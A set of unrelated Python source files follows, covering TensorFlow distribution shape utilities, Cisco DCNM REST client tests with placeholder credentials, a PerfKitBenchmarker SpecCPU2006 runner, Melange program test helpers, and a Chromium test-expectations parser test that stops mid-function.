"""Reshapes/transposes `Distribution` `Tensor` from S+B+E to B_+E_+S_.
Where:
- `B_ = B if B or not expand_batch_dim else [1]`,
- `E_ = E if E else [1]`,
- `S_ = [tf.reduce_prod(S)]`.
Args:
x: `Tensor`.
expand_batch_dim: Python `bool`. If `True` the batch dims will be expanded
such that `batch_ndims >= 1`.
name: Python `str`. The name to give this op.
Returns:
x: `Tensor`. Input transposed/reshaped to `B_+E_+S_`.
sample_shape: `Tensor` (1D, `int32`).
"""
with self._name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name="x")
# x.shape: S+B+E
sample_shape, batch_shape, event_shape = self.get_shape(x)
event_shape = distribution_util.pick_vector(
self._event_ndims_is_0, [1], event_shape)
if expand_batch_dim:
batch_shape = distribution_util.pick_vector(
self._batch_ndims_is_0, [1], batch_shape)
new_shape = array_ops.concat([[-1], batch_shape, event_shape], 0)
x = array_ops.reshape(x, shape=new_shape)
# x.shape: [prod(S)]+B_+E_
x = distribution_util.rotate_transpose(x, shift=-1)
# x.shape: B_+E_+[prod(S)]
return x, sample_shape
# TODO(jvdillon): Make remove expand_batch_dim and make expand_batch_dim=False
# the default behavior.
def undo_make_batch_of_event_sample_matrices(
self, x, sample_shape, expand_batch_dim=True,
name="undo_make_batch_of_event_sample_matrices"):
"""Reshapes/transposes `Distribution` `Tensor` from B_+E_+S_ to S+B+E.
Where:
- `B_ = B if B or not expand_batch_dim else [1]`,
- `E_ = E if E else [1]`,
- `S_ = [tf.reduce_prod(S)]`.
This function "reverses" `make_batch_of_event_sample_matrices`.
Args:
x: `Tensor` of shape `B_+E_+S_`.
sample_shape: `Tensor` (1D, `int32`).
expand_batch_dim: Python `bool`. If `True` the batch dims will be expanded
such that `batch_ndims>=1`.
name: Python `str`. The name to give this op.
Returns:
x: `Tensor`. Input transposed/reshaped to `S+B+E`.
"""
with self._name_scope(name, values=[x, sample_shape]):
x = ops.convert_to_tensor(x, name="x")
# x.shape: _B+_E+[prod(S)]
sample_shape = ops.convert_to_tensor(sample_shape, name="sample_shape")
x = distribution_util.rotate_transpose(x, shift=1)
# x.shape: [prod(S)]+_B+_E
if self._is_all_constant_helper(self.batch_ndims, self.event_ndims):
if self._batch_ndims_is_0 or self._event_ndims_is_0:
squeeze_dims = []
if self._event_ndims_is_0:
squeeze_dims += [-1]
if self._batch_ndims_is_0 and expand_batch_dim:
squeeze_dims += [1]
if squeeze_dims:
x = array_ops.squeeze(x, axis=squeeze_dims)
# x.shape: [prod(S)]+B+E
_, batch_shape, event_shape = self.get_shape(x)
else:
s = (x.get_shape().as_list() if x.get_shape().is_fully_defined()
else array_ops.shape(x))
batch_shape = s[1:1+self.batch_ndims]
# Since sample_dims=1 and is left-most, we add 1 to the number of
# batch_ndims to get the event start dim.
event_start = array_ops.where_v2(
math_ops.logical_and(expand_batch_dim, self._batch_ndims_is_0), 2,
1 + self.batch_ndims)
event_shape = s[event_start:event_start+self.event_ndims]
new_shape = array_ops.concat([sample_shape, batch_shape, event_shape], 0)
x = array_ops.reshape(x, shape=new_shape)
# x.shape: S+B+E
return x
@contextlib.contextmanager
def _name_scope(self, name=None, values=None):
"""Helper function to standardize op scope."""
with ops.name_scope(self.name):
with ops.name_scope(name, values=(
(values or []) + [self.batch_ndims, self.event_ndims])) as scope:
yield scope
def _is_all_constant_helper(self, *args):
"""Helper which returns True if all inputs are constant_value."""
return all(tensor_util.constant_value(x) is not None for x in args)
def _assert_non_negative_int32_scalar(self, x):
"""Helper which ensures that input is a non-negative, int32, scalar."""
x = ops.convert_to_tensor(x, name="x")
if x.dtype.base_dtype != dtypes.int32.base_dtype:
raise TypeError("%s.dtype=%s is not %s" % (x.name, x.dtype, dtypes.int32))
x_value_static = tensor_util.constant_value(x)
if x.get_shape().ndims is not None and x_value_static is not None:
if x.get_shape().ndims != 0:
raise ValueError("%s.ndims=%d is not 0 (scalar)" %
(x.name, x.get_shape().ndims))
if x_value_static < 0:
raise ValueError("%s.value=%d cannot be negative" %
(x.name, x_value_static))
return x
if self.validate_args:
x = control_flow_ops.with_dependencies([
check_ops.assert_rank(x, 0),
check_ops.assert_non_negative(x)], x)
return x
def _introspect_ndims(self, ndims):
"""Helper to establish some properties of input ndims args."""
if self._is_all_constant_helper(ndims):
return (tensor_util.constant_value(ndims),
tensor_util.constant_value(ndims) == 0)
return None, math_ops.equal(ndims, 0)
|
|
# Copyright 2015 Cisco Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import mock
from oslo_config import cfg
from oslotest import base
from networking_cisco.apps.saf.common import config
from networking_cisco.apps.saf.server import cisco_dfa_rest as dc
"""This file includes test cases for cisco_dfa_rest.py."""
FAKE_DCNM_IP = '1.1.1.1'
FAKE_DCNM_USERNAME = 'dcnmuser'
FAKE_DCNM_PASSWD = 'dcnmpass'
class TestNetwork(object):
segmentation_id = 123456
name = 'cisco_test_network'
config_profile = 'defaultL2ConfigProfile'
class TestCiscoDFAClient(base.BaseTestCase):
"""Test cases for DFARESTClient."""
def setUp(self):
# Declare the test resource.
super(TestCiscoDFAClient, self).setUp()
# Setting DCNM parameters.
cfg.CONF.set_override('dcnm_ip', FAKE_DCNM_IP, group='dcnm')
cfg.CONF.set_override('dcnm_user', FAKE_DCNM_USERNAME, group='dcnm')
cfg.CONF.set_override('dcnm_password', FAKE_DCNM_PASSWD, group='dcnm')
cfg.CONF.set_override('timeout_resp', 0.01, group='dcnm')
self.cfg = config.CiscoDFAConfig().cfg
self.send_req = mock.patch.object(dc.DFARESTClient,
'_send_request').start()
self.get_vers = mock.patch.object(dc.DFARESTClient,
'get_version').start()
self.login = mock.patch.object(dc.DFARESTClient,
'_login_request').start()
self.logout = mock.patch.object(dc.DFARESTClient,
'_logout_request').start()
self.send_req.return_value = mock.Mock()
self.send_req.return_value.status_code = 200
self.send_req.return_value.json.return_value = {}
self.get_vers.return_value = '7.0(1)'
self.dcnm_client = dc.DFARESTClient(self.cfg)
self.testnetwork = TestNetwork()
def test_create_project(self):
"""Test create project."""
self.send_req.reset_mock()
org_name = 'Cisco'
part_name = self.dcnm_client._part_name
dci = 100
orch_id = 'OpenStack Controller'
self.dcnm_client.create_project(orch_id, org_name, part_name, dci)
call_cnt = self.dcnm_client._send_request.call_count
self.assertEqual(2, call_cnt)
# Check call to partition and organization happens.
org_pyld = {
'organizationName': org_name,
'description': org_name,
'orchestrationSource': "OpenStack Controller"}
part_pyld = {
'partitionName': part_name,
'organizationName': org_name,
'description': org_name,
'serviceNodeIpAddress': None}
org_url = self.dcnm_client._org_url
part_url = self.dcnm_client._create_part_url % org_name
expected_calls = [mock.call('POST', org_url, org_pyld, 'organization'),
mock.call('POST', part_url, part_pyld, 'partition')]
self.assertEqual(expected_calls,
self.dcnm_client._send_request.call_args_list)
def test_create_network(self):
"""Test create network."""
network_info = {}
cfg_args = []
seg_id = str(self.testnetwork.segmentation_id)
config_profile = self.testnetwork.config_profile
network_name = self.testnetwork.name
tenant_name = 'Cisco'
part_name = self.dcnm_client._part_name
url = self.dcnm_client._create_network_url % (tenant_name, part_name)
cfg_args.append("$segmentId=" + seg_id)
cfg_args.append("$netMaskLength=16")
cfg_args.append("$gatewayIpAddress=30.31.32.1")
cfg_args.append("$networkName=" + network_name)
cfg_args.append("$vlanId=0")
cfg_args.append("$vrfName=%s:%s" % (tenant_name, part_name))
cfg_args = ';'.join(cfg_args)
dhcp_scopes = {'ipRange': '10.11.12.14-10.11.12.254',
'subnet': '10.11.12.13',
'gateway': '10.11.12.1'}
network_info = {"segmentId": seg_id,
"vlanId": "0",
"mobilityDomainId": "None",
"profileName": config_profile,
"networkName": network_name,
"configArg": cfg_args,
"organizationName": tenant_name,
"partitionName": part_name,
"description": network_name,
"dhcpScope": dhcp_scopes}
self.dcnm_client._create_network(network_info)
self.dcnm_client._send_request.assert_called_with('POST', url,
network_info,
'network')
def test_delete_network(self):
"""Test delete network."""
seg_id = self.testnetwork.segmentation_id
tenant_name = 'cisco'
part_name = self.dcnm_client._part_name
url = self.dcnm_client._network_url % (tenant_name, part_name, seg_id)
self.dcnm_client.delete_network(tenant_name, self.testnetwork)
self.dcnm_client._send_request.assert_called_with('DELETE', url,
'', 'network')
def test_delete_project(self):
"""Test delete tenant."""
self.send_req.reset_mock()
tenant_name = 'cisco'
part_name = self.dcnm_client._part_name
self.dcnm_client.delete_project(tenant_name, part_name)
call_cnt = self.dcnm_client._send_request.call_count
self.assertEqual(2, call_cnt)
# Check the calls to delete partition and org happens.
del_org_url = self.dcnm_client._del_org_url % tenant_name
del_part_url = self.dcnm_client._del_part % (tenant_name, part_name)
expected_calls = [mock.call('DELETE', del_part_url, '', 'partition'),
mock.call('DELETE', del_org_url, '', 'organization')]
self.assertEqual(expected_calls,
self.dcnm_client._send_request.call_args_list)
def test_http_verify_protocol(self):
"""Test login test using http. """
self.login.reset_mock()
self.logout.reset_mock()
self.dcnm_client._verify_protocol('http')
test_login_url = 'http://' + FAKE_DCNM_IP + '/rest/logon'
test_logout_url = 'http://' + FAKE_DCNM_IP + '/rest/logout'
self.login.assert_called_with(test_login_url)
self.logout.assert_called_with(test_logout_url)
def test_https_verify_protocol(self):
"""Test login test using https. """
self.login.reset_mock()
self.logout.reset_mock()
self.dcnm_client._verify_protocol('https')
test_login_url = 'https://' + FAKE_DCNM_IP + '/rest/logon'
test_logout_url = 'https://' + FAKE_DCNM_IP + '/rest/logout'
self.login.assert_called_with(test_login_url)
self.logout.assert_called_with(test_logout_url)
def test_get_segmentid_range(self):
"""Test get segment ID range."""
self.send_req.reset_mock()
orch_id = 'OpenStack_Controller'
self.dcnm_client.get_segmentid_range(orch_id)
segment_range_url = self.dcnm_client._segmentid_ranges_url + '/' + (
orch_id)
expected_calls = [mock.call('GET', segment_range_url, None,
'segment-id range')]
self.assertEqual(expected_calls,
self.dcnm_client._send_request.call_args_list)
def test_set_segmentid_range(self):
"""Test set segment ID range."""
self.send_req.reset_mock()
orch_id = 'OpenStack_Controller'
segid_min = 10000
segid_max = 12000
self.dcnm_client.set_segmentid_range(orch_id, segid_min, segid_max)
segment_range_url = self.dcnm_client._segmentid_ranges_url
payload = {'orchestratorId': orch_id,
'segmentIdRanges': "%s-%s" % (segid_min, segid_max)}
expected_calls = [mock.call('POST', segment_range_url, payload,
'segment-id range')]
self.assertEqual(expected_calls,
self.dcnm_client._send_request.call_args_list)
def test_update_segmentid_range(self):
"""Test set segment ID range."""
self.send_req.reset_mock()
orch_id = 'OpenStack_Controller'
segid_min = 10000
segid_max = 12000
self.dcnm_client.update_segmentid_range(orch_id, segid_min, segid_max)
segment_range_url = self.dcnm_client._segmentid_ranges_url + '/' + (
orch_id)
payload = {'orchestratorId': orch_id,
'segmentIdRanges': "%s-%s" % (segid_min, segid_max)}
expected_calls = [mock.call('PUT', segment_range_url, payload,
'segment-id range')]
self.assertEqual(expected_calls,
self.dcnm_client._send_request.call_args_list)
|
|
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs SpecCPU2006.
From SpecCPU2006's documentation:
The SPEC CPU2006 benchmark is SPEC's industry-standardized, CPU-intensive
benchmark suite, stressing a system's processor, memory subsystem and compiler.
SpecCPU2006 homepage: http://www.spec.org/cpu2006/
"""
import logging
import os
import re
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import sample
FLAGS = flags.FLAGS
flags.DEFINE_enum('benchmark_subset', 'int', ['int', 'fp', 'all'],
'specify a subset of benchmarks to run: int, fp, all')
flags.DEFINE_string('runspec_config', 'linux64-x64-gcc47.cfg',
'name of the cpu2006 configuration to use (runspec --config'
' argument)')
flags.DEFINE_integer('runspec_iterations', 3,
'number of benchmark iterations to execute - default 3 '
'(runspec --iterations argument)')
flags.DEFINE_string('runspec_define', '',
'optional comma separated list of preprocessor macros: '
'SYMBOL[=VALUE] - e.g. numa,smt,sse=SSE4.2 (runspec '
'--define arguments)')
flags.DEFINE_boolean('runspec_enable_32bit', default=False,
help='setting this flag will result in installation of '
'multilib packages to enable use of 32-bit cpu2006 '
'binaries (useful when running on memory constrained '
'instance types where 64-bit execution may be problematic '
' - i.e. < 1.5-2GB/core)')
BENCHMARK_INFO = {'name': 'speccpu2006',
'description': 'Run Spec CPU2006',
'scratch_disk': True,
'num_machines': 1}
SPECCPU2006_TAR = 'cpu2006v1.2.tgz'
SPECCPU2006_DIR = 'cpu2006'
def GetInfo():
return BENCHMARK_INFO
def CheckPrerequisites():
"""Verifies that the required resources are present.
Raises:
perfkitbenchmarker.data.ResourceNotFound: On missing resource.
"""
data.ResourcePath(SPECCPU2006_TAR)
def Prepare(benchmark_spec):
"""Install SpecCPU2006 on the target vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
vms = benchmark_spec.vms
vm = vms[0]
logging.info('prepare SpecCPU2006 on %s', vm)
vm.Install('wget')
vm.Install('build_tools')
vm.Install('fortran')
if (FLAGS.runspec_enable_32bit):
vm.Install('multilib')
vm.Install('numactl')
try:
local_tar_file_path = data.ResourcePath(SPECCPU2006_TAR)
except data.ResourceNotFound as e:
logging.error('Please provide %s under perfkitbenchmarker/data directory '
'before running SpecCPU2006 benchmark.', SPECCPU2006_TAR)
raise errors.Benchmarks.PrepareException(str(e))
vm.tar_file_path = os.path.join(vm.GetScratchDir(), SPECCPU2006_TAR)
vm.spec_dir = os.path.join(vm.GetScratchDir(), SPECCPU2006_DIR)
vm.RemoteCommand('chmod 777 %s' % vm.GetScratchDir())
vm.PushFile(local_tar_file_path, vm.GetScratchDir())
vm.RemoteCommand('cd %s && tar xvfz %s' % (vm.GetScratchDir(),
SPECCPU2006_TAR))
def ExtractScore(stdout, vm):
"""Exact the Spec (int|fp) score from stdout.
Args:
stdout: stdout from running RemoteCommand.
vm: The vm instance where Spec CPU2006 was run.
Sample input for SPECint:
...
...
=============================================
400.perlbench 9770 417 23.4 *
401.bzip2 9650 565 17.1 *
403.gcc 8050 364 22.1 *
429.mcf 9120 364 25.1 *
445.gobmk 10490 499 21.0 *
456.hmmer 9330 491 19.0 *
458.sjeng 12100 588 20.6 *
462.libquantum 20720 468 44.2 *
464.h264ref 22130 700 31.6 *
471.omnetpp 6250 349 17.9 *
473.astar 7020 482 14.6 *
483.xalancbmk 6900 248 27.8 *
Est. SPECint(R)_base2006 22.7
Sample input for SPECfp:
...
...
=============================================
410.bwaves 13590 717 19.0 *
416.gamess 19580 923 21.2 *
433.milc 9180 480 19.1 *
434.zeusmp 9100 600 15.2 *
435.gromacs 7140 605 11.8 *
436.cactusADM 11950 1289 9.27 *
437.leslie3d 9400 859 10.9 *
444.namd 8020 504 15.9 *
447.dealII 11440 409 28.0 *
450.soplex 8340 272 30.6 *
453.povray 5320 231 23.0 *
454.calculix 8250 993 8.31 *
459.GemsFDTD 10610 775 13.7 *
465.tonto 9840 565 17.4 *
470.lbm 13740 365 37.7 *
481.wrf 11170 788 14.2 *
482.sphinx3 19490 668 29.2 *
Est. SPECfp(R)_base2006 17.5
Returns:
A list of sample.Sample objects.
"""
results = []
re_begin_section = re.compile('^={1,}')
re_end_section = re.compile(r'Est. (SPEC.*_base2006)\s*(\S*)')
result_section = []
in_result_section = False
# Extract the summary section
for line in stdout.splitlines():
if in_result_section:
result_section.append(line)
# search for begin of result section
match = re.search(re_begin_section, line)
if match:
assert not in_result_section
in_result_section = True
continue
# search for end of result section
match = re.search(re_end_section, line)
if match:
assert in_result_section
spec_name = str(match.group(1))
spec_score = float(match.group(2))
in_result_section = False
# remove the final SPEC(int|fp) score, which has only 2 columns.
result_section.pop()
metadata = {'machine_type': vm.machine_type, 'num_cpus': vm.num_cpus}
results.append(sample.Sample(spec_name, spec_score, '', metadata))
for benchmark in result_section:
# ignore failed runs
if re.search('NR', benchmark):
continue
# name, ref_time, time, score, misc
name, _, _, score, _ = benchmark.split()
results.append(sample.Sample(str(name), float(score), '', metadata))
return results
def ParseOutput(vm):
"""Parses the output from Spec CPU2006.
Args:
vm: The vm instance where Spec CPU2006 was run.
Returns:
A list of samples to be published (in the same format as Run() returns).
"""
results = []
log_files = []
# FIXME(liquncheng): Only reference runs generate SPEC scores. The log
# id is hardcoded as 001, which might change with different runspec
# parameters. Spec CPU 2006 will generate different logs for build, test
# run, training run and ref run.
if FLAGS.benchmark_subset in ('int', 'all'):
log_files.append('CINT2006.001.ref.txt')
if FLAGS.benchmark_subset in ('fp', 'all'):
log_files.append('CFP2006.001.ref.txt')
for log in log_files:
stdout, _ = vm.RemoteCommand('cat %s/result/%s' % (vm.spec_dir, log),
should_log=True)
results.extend(ExtractScore(stdout, vm))
return results
def Run(benchmark_spec):
"""Run SpecCPU2006 on the target vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Returns:
A list of sample.Sample objects.
"""
vms = benchmark_spec.vms
vm = vms[0]
logging.info('SpecCPU2006 running on %s', vm)
num_cpus = vm.num_cpus
iterations = ' --iterations=' + repr(FLAGS.runspec_iterations) if \
FLAGS.runspec_iterations != 3 else ''
defines = ' --define ' + ' --define '.join(FLAGS.runspec_define.split(','))\
if FLAGS.runspec_define != '' else ''
vm.RemoteCommand('cd %s; . ./shrc; ./bin/relocate; . ./shrc; rm -rf result; '
'runspec --config=%s --tune=base '
'--size=ref --noreportable --rate %s%s%s %s'
% (vm.spec_dir, FLAGS.runspec_config, num_cpus, iterations,
defines, FLAGS.benchmark_subset))
logging.info('SpecCPU2006 Results:')
return ParseOutput(vm)
def Cleanup(benchmark_spec):
"""Cleanup SpecCPU2006 on the target vm.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
"""
vms = benchmark_spec.vms
vm = vms[0]
vm.RemoteCommand('rm -rf %s' % vm.spec_dir)
vm.RemoteCommand('rm -f %s' % vm.tar_file_path)
|
|
#!/usr/bin/env python2.5
#
# Copyright 2011 the Melange authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utils for manipulating program data.
"""
from datetime import date
from soc.models.document import Document
from soc.models.org_app_survey import OrgAppSurvey
from soc.models.site import Site
from soc.models.sponsor import Sponsor
from soc.models.user import User
from soc.modules.gci.models.organization import GCIOrganization
from soc.modules.gci.models.program import GCIProgram
from soc.modules.gci.models.timeline import GCITimeline
from soc.modules.gsoc.models.organization import GSoCOrganization
from soc.modules.gsoc.models.program import GSoCProgram
from soc.modules.gsoc.models.timeline import GSoCTimeline
from soc.modules.seeder.logic.providers.string import DocumentKeyNameProvider
from soc.modules.seeder.logic.seeder import logic as seeder_logic
class ProgramHelper(object):
"""Helper class to aid in manipulating program data.
"""
def __init__(self):
"""Initializes the ProgramHelper.
Args:
program: a program
org_app: an organization application
org: an organization
site: a site
"""
self.founder = None
self.sponsor = None
self.program = None
self.org_app = None
self.org = None
self.site = None
self.createOrg = self.createOrUpdateOrg
def seed(self, model, properties,
auto_seed_optional_properties=True):
return seeder_logic.seed(model, properties, recurse=False,
auto_seed_optional_properties=auto_seed_optional_properties)
def seedn(self, model, properties, n,
auto_seed_optional_properties=True):
return seeder_logic.seedn(model, n, properties, recurse=False,
auto_seed_optional_properties=auto_seed_optional_properties)
def createFounder(self, override={}):
"""Creates a founder for the defined properties.
"""
if self.founder:
return self.founder
properties = {}
properties.update(override)
self.founder = self.seed(User, properties)
return self.founder
def createSponsor(self, override={}):
"""Creates a sponsor for the defined properties.
"""
if self.sponsor:
return self.sponsor
if self.founder is None:
self.createFounder()
properties = {'founder': self.founder, 'home': None}
properties.update(override)
self.sponsor = self.seed(Sponsor, properties)
return self.sponsor
def createProgram(self, override={}):
"""Creates a program for the defined properties.
"""
if self.sponsor is None:
self.createSponsor()
def createOrgApp(self, override={}):
"""Creates an organization application for the defined properties.
"""
if self.org_app:
return self.org_app
if self.program is None:
self.createProgram()
# TODO (Madhu): Remove scope and author fields once the data
# conversion is done.
properties = {
'key_name': 'gci_program/%s/orgapp' % self.program.key().name(),
'scope': self.program, 'program': self.program,
'modified_by': self.founder,
'created_by': self.founder,
'author': self.founder,
'schema': ('[["item"],{"item":{"field_type":"input_text",'
'"required":false, "label":"test"}}]'),
'survey_content': None,
}
properties.update(override)
self.org_app = self.seed(OrgAppSurvey, properties)
return self.org_app
def _updateEntity(self, entity, override):
"""Updates self.<entity> with override.
"""
properties = entity.properties()
for name, value in override.iteritems():
properties[name].__set__(entity, value)
entity.put()
return entity
def _updateOrg(self, override):
"""Updates self.org with override.
"""
return self._updateEntity(self.org, override)
def createOrUpdateOrg(self, override={}):
"""Creates or updates an org (self.org) for the defined properties.
"""
if self.org:
if not override:
return self.org
else:
return self._updateOrg(override)
self.org = self.createNewOrg(override)
return self.org
def createNewOrg(self, override={}):
"""Creates a new organization for the defined properties.
This new organization will not be stored in self.org but returned.
"""
if self.program is None:
self.createProgram()
def createSite(self, override={}):
"""Creates a site for the defined properties.
"""
if self.program is None:
self.createProgram()
properties = {'key_name': 'site', 'link_id': 'site',
'active_program': self.program}
properties.update(override)
self.site = Site(**properties)
self.site.put()
return self.site
class GSoCProgramHelper(ProgramHelper):
"""Helper class to aid in manipulating GSoC program data.
"""
def __init__(self):
"""Initializes the GSoCProgramHelper.
"""
super(GSoCProgramHelper, self).__init__()
def createProgram(self, override={}):
"""Creates a program for the defined properties.
"""
if self.program:
return self.program
super(GSoCProgramHelper, self).createProgram()
properties = {'scope': self.sponsor}
self.program_timeline = self.seed(GSoCTimeline, properties)
properties = {'timeline': self.program_timeline,
'status': 'visible', 'apps_tasks_limit': 20,
'scope': self.sponsor,
'student_agreement': None, 'events_page': None,
'help_page': None, 'connect_with_us_page': None,
'mentor_agreement': None, 'org_admin_agreement': None,
'terms_and_conditions': None,
'home': None, 'about_page': None}
properties.update(override)
self.program = self.seed(GSoCProgram, properties)
properties = {
'prefix': 'gsoc_program', 'scope': self.program,
'read_access': 'public', 'key_name': DocumentKeyNameProvider(),
'modified_by': self.founder, 'author': self.founder,
'home_for': None,
}
document = self.seed(Document, properties=properties)
self.program.about_page = document
self.program.events_page = document
self.program.help_page = document
self.program.connect_with_us_page = document
self.program.privacy_policy = document
self.program.put()
return self.program
def createNewOrg(self, override={}):
"""Creates a new organization for the defined properties.
This new organization will not be stored in self.org but returned.
"""
super(GSoCProgramHelper, self).createNewOrg(override)
properties = {'scope': self.program, 'status': 'active',
'scoring_disabled': False, 'max_score': 5,
'founder': self.founder, 'home': None,}
properties.update(override)
return self.seed(GSoCOrganization, properties)
class GCIProgramHelper(ProgramHelper):
"""Helper class to aid in manipulating GCI program data.
"""
def __init__(self):
"""Initializes the GCIProgramHelper.
"""
super(GCIProgramHelper, self).__init__()
def createProgram(self, override={}):
"""Creates a program for the defined properties.
"""
if self.program:
return self.program
super(GCIProgramHelper, self).createProgram()
properties = {'scope': self.sponsor}
self.program_timeline = self.seed(GCITimeline, properties)
properties = {
'timeline': self.program_timeline,
'status': 'visible',
'scope': self.sponsor,
'student_agreement': None, 'events_page': None,
'help_page': None, 'connect_with_us_page': None,
'mentor_agreement': None, 'org_admin_agreement': None,
'terms_and_conditions': None, 'home': None, 'about_page': None,
'nr_simultaneous_tasks': 5,
'student_min_age': 13, 'student_max_age': 17,
'student_min_age_as_of': date.today(),
'task_types': ['code', 'documentation', 'design'],
}
properties.update(override)
self.program = self.seed(GCIProgram, properties)
properties = {
'prefix': 'gci_program', 'scope': self.program,
'read_access': 'public', 'key_name': DocumentKeyNameProvider(),
'modified_by': self.founder, 'author': self.founder,
'home_for': None,
}
document = self.seed(Document, properties=properties)
self.program.about_page = document
self.program.events_page = document
self.program.help_page = document
self.program.connect_with_us_page = document
self.program.privacy_policy = document
self.program.put()
return self.program
def createNewOrg(self, override={}):
"""Creates a new organization for the defined properties.
This new organization will not be stored in self.org but returned.
"""
super(GCIProgramHelper, self).createNewOrg(override)
properties = {'scope': self.program, 'status': 'active',
'founder': self.founder,
'home': None,
'task_quota_limit': 100}
properties.update(override)
return self.seed(GCIOrganization, properties)
|
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from typ import expectations_parser
from typ import json_results
ConflictResolutionTypes = expectations_parser.ConflictResolutionTypes
ResultType = json_results.ResultType
Expectation = expectations_parser.Expectation
TestExpectations = expectations_parser.TestExpectations
class TaggedTestListParserTest(unittest.TestCase):
def testInitWithGoodData(self):
good_data = """
# This is a test expectation file.
#
# tags: [ Release Debug ]
# tags: [ Linux
# Mac Mac10.1 Mac10.2
# Win ]
# results: [ Skip ]
crbug.com/12345 [ Mac ] b1/s1 [ Skip ] # foo
crbug.com/23456 [ Mac Debug ] b1/s2 [ Skip ]
"""
parser = expectations_parser.TaggedTestListParser(good_data)
tag_sets = [{'debug', 'release'},
{'linux', 'mac', 'mac10.1', 'mac10.2', 'win'}]
self.assertEqual(tag_sets, parser.tag_sets)
expected_outcome = [
expectations_parser.Expectation('crbug.com/12345', 'b1/s1',
['mac'], ['SKIP'], 10, trailing_comments=' # foo'),
expectations_parser.Expectation('crbug.com/23456', 'b1/s2',
['mac', 'debug'], ['SKIP'], 11)
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testInitWithBadData(self):
bad_data = """
# This is a test expectation file.
#
# tags: [ tag1 tag2 tag3 ]
# tags: [ tag4 ]
# results: [ Skip ]
crbug.com/12345 [ Mac b1/s1 [ Skip ]
"""
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(bad_data)
def testInitWithNonCanonicalResultTagDefinition(self):
bad_data = """
# This is a test expectation file.
#
# tags: [ tag1 tag2 tag3 ]
# tags: [ tag4 ]
# results: [ skip ]
"""
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(bad_data)
def testInitWithNonCanonicalResultTagUsage(self):
bad_data = """
# This is a test expectation file.
#
# tags: [ tag1 tag2 tag3 ]
# tags: [ tag4 ]
# results: [ Skip ]
crbug.com/12345 [ tag1 ] some/test/name [ SKIP ]
"""
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(bad_data)
def testTagAfterExpectationsStart(self):
bad_data = """
# This is a test expectation file.
#
# tags: [ tag1 tag2 tag3 ]
crbug.com/12345 [ tag1 ] b1/s1 [ Skip ]
# tags: [ tag4 ]
"""
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(bad_data)
def testParseExpectationLineEverythingThere(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/23456 [ Mac ] b1/s2 [ Skip ]'
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation('crbug.com/23456', 'b1/s2',
['mac'], ['SKIP'], 3)
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineAngleProjectNoTags(self):
raw_data = '# tags: [ ]\n# results: [ Skip ]\ncrbug.com/angleproject/23456 b1/s2 [ Skip ]'
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation('crbug.com/angleproject/23456',
'b1/s2', [], ['SKIP'], 3)
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineBadProject(self):
raw_data = '# tags: [ ]\n# results: [ Skip ]\ncrbug.com/bad/project/23456 b1/s2 [ Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineBadTag(self):
raw_data = '# tags: None\n# results: [ Skip ]\ncrbug.com/23456 [ Mac ] b1/s2 [ Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineNoTags(self):
raw_data = '# tags: [ All ]\n# results: [ Skip ]\ncrbug.com/12345 b1/s1 [ Skip ]'
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation('crbug.com/12345', 'b1/s1', [],
['SKIP'], 3),
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineNoBug(self):
raw_data = '# tags: [ All ]\n# results: [ Skip ]\n[ All ] b1/s1 [ Skip ]'
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation(None, 'b1/s1', ['all'], ['SKIP'], 3),
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineNoBugNoTags(self):
raw_data = '# tags: [ All ]\n# results: [ Skip ]\nb1/s1 [ Skip ]'
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
